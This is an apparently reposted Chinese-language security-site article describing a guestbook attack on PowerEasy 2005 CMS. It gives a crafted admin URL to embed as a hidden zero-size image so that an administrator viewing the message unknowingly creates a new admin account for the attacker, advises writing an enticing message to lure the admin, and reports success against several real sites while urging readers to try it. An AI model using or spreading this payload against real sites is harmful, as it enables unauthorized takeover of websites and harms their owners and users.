通杀动易2005的 XSS 攻击

2023-12-04 0 716

动易2005里面,留言时候存在一个XSS。

攻击方法如下 :

首先在网站注册一个普通会员,然后去GUESTBOOK留言,在插入图片的时候地址写上(建议在原代码里面把图片的高度与宽度都设置成0,这样在图片前面加上这个连接,基本上就看不见图片了,图片的连接却被管理员解吸执行了):

http://localhost/PowerEasy/admin/admin_admin.asp?AdminName=xiaod&username=xiaod&password=123456&pwdconfirm=123456&purview=1&Action=SaveAdd

上面是本地测试地址。

只要你的留言写的足够诱惑,只要管理员一看,就OK了,他回复了你,你就是后台管理员了···

我自己测试了几个站,结果都成功了,呵呵。大家也可以去测试一下,通杀了 SQL 与AC版···

收藏 (0) 打赏

感谢您的支持,我会继续努力的!

打开微信/支付宝扫一扫,即可进行扫码打赏哦,分享从这里开始,精彩与您同在
点赞 (0)

悠久资源 入侵防御 通杀动易2005的 XSS 攻击 https://www.u-9.cn/security/fangyu/72071.html

常见问题

相关文章

发表评论
暂无评论
官方客服团队

为您解决烦忧 - 24小时在线 专业服务